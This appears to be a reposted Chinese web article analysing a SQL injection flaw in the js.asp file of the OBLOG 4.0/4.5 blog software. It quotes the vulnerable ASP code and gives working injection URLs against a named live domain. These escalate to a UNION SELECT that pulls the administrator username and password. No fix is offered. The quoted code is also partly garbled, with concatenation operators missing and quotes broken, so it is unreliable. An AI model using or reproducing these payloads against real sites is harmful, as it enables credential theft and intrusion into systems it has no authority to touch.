主頁 > 知識庫 > OBLOG4.0 OBLOG4.5漏洞利用分析

OBLOG4.0 OBLOG4.5漏洞利用分析

熱門標簽:交行外呼系統(tǒng)有哪些 隨州銷售外呼系統(tǒng)平臺 激戰(zhàn)黃昏地圖標注說明 溫嶺代理外呼系統(tǒng) 防城港市ai電銷機器人 寧夏保險智能外呼系統(tǒng)哪家好 臨滄移動外呼系統(tǒng)哪家有 怎么更改地圖標注電話 不同的地圖標注
來源:Deepen Study

漏洞文件:js.asp
%
Dim oblog
set oblog=new class_sys
oblog.autoupdate=False
oblog.start
dim js_blogurl,n
js_blogurl=Trim(oblog.CacheConfig(3))
n=CInt(Request(”n”))
if n=0 then n=1
select case CInt(Request(”j”))
case 1
call tongji()
case 2
call topuser()
case 3
call adduser()
case 4
call listclass()
case 5
call showusertype()
case 6
call listbestblog()
case 7
call showlogin()
case 8
call showplace()
case 9
call showphoto()
case 10
call showblogstars()
Case 11
Call show_hotblog()
Case 12
Call show_teams()
Case 13
Call show_posts()
Case 14
Call show_hottag()
case 0
call showlog()
end select
****************省略部分代碼******************
Sub show_posts()
Dim teamid,postnum,l,u,t
teamid=Request(”tid”)
postnum=n
l=CInt(Request(”l”))
u=CInt(Request(”u”))
t=CInt(Request(”t”))
Dim rs,sql,sRet,sAddon
Sql=”select Top ”  postnum  ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”
If teamid>“” And teamid>“0″ Then
teamid=Replace(teamid,”|”,”,”)
Sql=Sql  ” And teamid In (”  teamid  “) ”
End If
Sql=Sql  ” order by postid Desc”
Set rs=oblog.Execute(Sql)
sRet=”

 ”
 Do While Not rs.Eof
 sAddon=”"
 * sRet=sRet  “ ”  oblog.Filt_html(Left(rs(2),l))  “”
 If u=1 Then sAddon=rs(4)
 if t=1 Then
 If sAddon>“” Then sAddon=sAddon  “,”
 sAddon=sAddon  rs(3)
 End If
 If sAddon>“” Then sAddon=”(”  sAddon  “)”
 sRet=sRet  sAddon  “

 ”
 rs.Movenext
 Loop
 Set rs = Nothing
 sRet=sRet  “


Response.write oblog.htm2js (sRet,True)
End Sub
調用show_posts()過程必須要符合上面的參數(shù)n=1,j=13
(”  teamid  “)
http://www.oblog.com.cn/js.asp?n=1j=13tid=1
http://www.oblog.com.cn/js.asp?n=1j=13tid=1) and 1=1 and (1=1 返回正常
http://www.oblog.com.cn/js.asp?n=1j=13tid=1) and 1=1 and (1=2 返回異常
猜管理員表名
http://www.oblog.com.cn/js.asp?n=1j=13tid=1) and 查詢語句 and (1=1

Sql=”select Top ”  postnum  ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”

http://www.oblog.com.cn/js.asp?n=1j=13tid=1) and 1=2 union select 1,2,3,4,5,6 from oblog_admin where id=(1

document.write('

*

‘);

gid=1跟pid=2里的1,2就是了 直接替換里面的1,2為username,password

http://www.oblog.com.cn/js.asp?n=1j=13tid=1) and 1=2 union select username,password,3,4,5,6 from oblog_admin where id=(1 

標簽:阜陽 沈陽 忻州 無錫 青海 紅河 哈密 河源

巨人網(wǎng)絡通訊聲明:本文標題《OBLOG4.0 OBLOG4.5漏洞利用分析》,本文關鍵詞  OBLOG4.0,OBLOG4.5,漏洞,利用,;如發(fā)現(xiàn)本文內容存在版權問題,煩請?zhí)峁┫嚓P信息告之我們,我們將及時溝通與處理。本站內容系統(tǒng)采集于網(wǎng)絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《OBLOG4.0 OBLOG4.5漏洞利用分析》相關的同類信息!
  • 本頁收集關于OBLOG4.0 OBLOG4.5漏洞利用分析的相關信息資訊供網(wǎng)民參考!
  • 推薦文章